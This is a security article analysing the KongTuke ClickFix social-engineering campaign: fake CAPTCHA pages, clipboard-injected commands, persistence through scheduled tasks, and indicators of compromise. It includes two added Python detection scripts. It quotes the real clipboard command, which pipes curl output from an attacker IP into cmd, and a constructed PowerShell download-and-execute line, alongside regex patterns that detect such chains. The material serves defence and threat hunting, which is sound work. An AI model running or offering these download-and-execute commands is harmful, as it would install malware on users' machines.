KongTuke ClickFix Activity Fuels New Wave of Social Engineering Malware Infections

By Azhar Khan

Overview of the KongTuke ClickFix Campaign

In early January 2026, a sophisticated social-engineering-driven malware operation known as KongTuke ClickFix activity was observed abusing compromised websites to deliver malicious payloads. Rather than relying on software vulnerabilities, the attackers focused on manipulating user behavior, using fake CAPTCHA-style verification pages to trigger execution.

The activity was documented in a controlled Windows lab environment that included a domain controller, but the infrastructure and techniques closely mirror real-world infection chains. The campaign reflects a growing trend in which attackers prioritize trust abuse over technical exploitation.

Compromised Websites and Script Injection

The infection chain begins when users visit a legitimate website that has been silently compromised. Malicious JavaScript injected into the site redirects visitors to a ClickFix CAPTCHA page hosted on attacker-controlled infrastructure.

These scripts dynamically collect contextual information, including the victim's IP address, browser, operating system, and referrer domain. The parameters are encoded and sent back to the attacker, allowing lightweight profiling of the visitor before payload delivery.

KongTuke ClickFix CAPTCHA page

Clipboard-Based Command Execution

A defining element of this campaign is clipboard injection. When the victim interacts with the ClickFix page, a malicious command is copied directly into the system clipboard without any visible indication.

The page then instructs the user to paste and execute the command, often framed as a final verification step. This method allows attackers to bypass many security controls by turning the user into the execution vector.

cmd.exe /c start "" /min cmd /k "curl http://144.31.221.60/a | cmd && exit"

Clipboard-injected command
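As an added detection example (not code from the article or from malware-traffic-analysis.net), the following Python scores process-creation command lines for the pattern shown above: a download utility whose output is piped straight into a command interpreter, a console hidden with start "" /min, and a URL built from a raw IP literal. It generalises the article's single cmd/curl command to the equivalent PowerShell form; every sample command line other than the first, and the example.invalid hosts, are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation command lines in the style of Sysmon Event ID 1 / Security 4688.
# The first is the clipboard-injected command quoted in the article; the rest are made up here.
SAMPLE_COMMAND_LINES = [
    'cmd.exe /c start "" /min cmd /k "curl http://144.31.221.60/a | cmd && exit"',
    'powershell.exe -w hidden -c "irm http://example.invalid/a | iex"',
    'cmd.exe /c curl https://example.invalid/readme.txt -o C:\\temp\\readme.txt',
    'cmd.exe /c dir C:\\Users',
]

# (pattern, weight, explanation). One strong signal or a few weak ones cross the threshold.
RULES = [
    (re.compile(r"\bcurl(\.exe)?\b[^|]*\|\s*cmd\b", re.I), 3, "curl output piped into cmd"),
    (re.compile(r"\b(irm|iwr|invoke-(web|rest)(request|method))\b[^|]*\|\s*iex\b", re.I), 3,
     "web content piped into iex"),
    (re.compile(r'\bstart\s+""\s+/min\b', re.I), 1, 'console hidden via start "" /min'),
    (re.compile(r"\bcmd(\.exe)?\s+/k\b", re.I), 1, "cmd /k keeps the shell alive"),
    (re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}\b", re.I), 1, "URL uses a raw IP literal"),
]
THRESHOLD = 3
URL = re.compile(r"""https?://[^\s"'|&]+""", re.I)

def analyse(cmdline):
    """Score one command line and pull out the hosts it contacts."""
    score, reasons = 0, []
    for pattern, weight, why in RULES:
        if pattern.search(cmdline):
            score += weight
            reasons.append(why)
    hosts = [urlparse(u).hostname for u in URL.findall(cmdline)]
    return {"score": score, "suspicious": score >= THRESHOLD, "reasons": reasons, "hosts": hosts}

def scan(cmdlines):
    """Return only the command lines that look like a ClickFix-style execution chain."""
    return [(c, analyse(c)) for c in cmdlines if analyse(c)["suspicious"]]

if __name__ == "__main__":
    for cmdline, verdict in scan(SAMPLE_COMMAND_LINES):
        print(verdict["score"], verdict["hosts"], "; ".join(verdict["reasons"]))
        print("   ", cmdline)
```

The plain download on the third line scores zero because nothing is piped into an interpreter, which is what separates this chain from ordinary curl usage.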

Post-Infection Network Activity

Once executed, the malware initiates a multi-stage network communication sequence. Initial HTTP requests retrieve loader components, followed by POST requests that register the infected host with attacker infrastructure.

The malware then performs external IP discovery using public services and establishes repeated encrypted connections over legacy and non-standard ports, suggesting command-and-control polling behavior.

KongTuke post infection traffic

Malware Payloads and Archive Analysis

The initial payload is a compressed archive approximately 25 MB in size containing a malicious Python package. It is extracted into a directory designed to resemble a legitimate Windows system path, reducing the likelihood of detection.

A second archive exceeding 200 MB is downloaded later. This payload masquerades as a Figma-related updater and contains additional components used for persistence and extended functionality.

Extracted malware components

Persistence Mechanisms

Persistence is achieved through multiple scheduled tasks configured to execute every few minutes indefinitely. These tasks re-launch malicious Python scripts and PowerShell components, ensuring the malware remains active even if individual files are removed.

The use of misleading task names and Microsoft-themed directory paths allows the malware to blend into normal system activity, significantly increasing dwell time.
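As an added hunting example that is not from the article, this Python scores rows of schtasks /query /fo CSV /v output and flags tasks that re-launch a script interpreter from a user-profile directory on a short repeat interval. The column names and the trimmed CSV layout are assumptions; the sample rows are constructed, with the task names and directories taken from the article's IoC list and the script file names and user name invented.

```python
import csv
import re

# Constructed rows in the shape of `schtasks /query /fo CSV /v` output (column names assumed, trimmed to
# the four used here). Task names and directories come from the article's IoCs; file names are invented.
SAMPLE_CSV = r'''"TaskName","Task To Run","Run As User","Repeat: Every"
"\SoftwareProtection","pythonw.exe C:\Users\alice\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\run.py","alice","0 Hour(s), 3 Minute(s)"
"\Remove-NetNatStaticMapping","powershell.exe -w hidden -f C:\Users\alice\AppData\Roaming\figmaUpdater\update.ps1","alice","0 Hour(s), 5 Minute(s)"
"\OneDrive Standalone Update Task","C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe","alice","N/A"
'''

# Task names reported in the article, compared case-insensitively without the leading backslash.
KNOWN_TASK_NAMES = {"softwareprotection", "remove-netnatstaticmapping"}
INTERPRETER = re.compile(r"\b(pythonw?|powershell|pwsh|wscript|cscript|mshta)(\.exe)?\b", re.I)
IN_APPDATA = re.compile(r"\\AppData\\", re.I)
MS_THEMED_APPDATA = re.compile(r"\\AppData\\(Local|LocalLow|Roaming)\\Microsoft\\", re.I)
THRESHOLD = 3

def repeat_minutes(value):
    """Minutes from a 'Repeat: Every' cell such as '0 Hour(s), 3 Minute(s)'; None if not repeating."""
    hours = re.search(r"(\d+)\s*Hour", value)
    mins = re.search(r"(\d+)\s*Minute", value)
    if not hours and not mins:
        return None
    return int(hours.group(1) if hours else 0) * 60 + int(mins.group(1) if mins else 0)

def score_task(row):
    """Weighted heuristics for one task row; the weights reflect how specific each signal is."""
    action, score, reasons = row["Task To Run"], 0, []
    if row["TaskName"].lstrip("\\").lower() in KNOWN_TASK_NAMES:
        score += 3; reasons.append("task name matches a reported IoC")
    if INTERPRETER.search(action) and IN_APPDATA.search(action):
        score += 2; reasons.append("script interpreter launched from the user profile")
    if MS_THEMED_APPDATA.search(action):
        score += 1; reasons.append("Microsoft-themed directory under AppData")
    every = repeat_minutes(row["Repeat: Every"])
    if every is not None and every <= 10:
        score += 1; reasons.append(f"repeats every {every} min")
    return {"name": row["TaskName"], "score": score, "reasons": reasons}

def hunt(csv_text, threshold=THRESHOLD):
    """Tasks whose score reaches the threshold, highest first; the OneDrive row stays below it."""
    rows = csv.DictReader(csv_text.splitlines())
    hits = [r for r in (score_task(row) for row in rows) if r["score"] >= threshold]
    return sorted(hits, key=lambda r: r["score"], reverse=True)

if __name__ == "__main__":
    for hit in hunt(SAMPLE_CSV):
        print(hit["score"], hit["name"], "; ".join(hit["reasons"]))
```

The benign OneDrive task lives in a Microsoft-named AppData directory too, so that signal alone is kept at a low weight and the interpreter-plus-short-interval combination does the real work.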

Indicators of Compromise

The following indicators were observed during analysis of the KongTuke ClickFix activity and can be used for detection and threat hunting.

File Hashes

  • d22b9d30b89d99ad80d1ee081fd20518985c1bc4e37b5e105bcc52231509fa25
  • 1dd91ba2f56ced5af731e67121619d6a9ef2cbb8f1524989fc542ef904605908

Persistence Artifacts

  • C:\Users\[username]\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\
  • C:\Users\[username]\AppData\Roaming\figmaUpdater\
  • Scheduled Task: SoftwareProtection
  • Scheduled Task: Remove-NetNatStaticMapping

Why ClickFix Remains Effective

ClickFix campaigns succeed because they exploit familiarity and urgency. Users are conditioned to trust CAPTCHA challenges and command execution instructions in certain contexts, particularly technical or enterprise environments.

This campaign demonstrates how user-driven execution chains can bypass traditional defenses that focus exclusively on exploit prevention.

The technical analysis and imagery referenced in this article are based on publicly documented research published by malware-traffic-analysis.net.

Azhar Khan
Azhar is a seasoned Cybersecurity Professional with over 8 years of experience in Cybersecurity Research.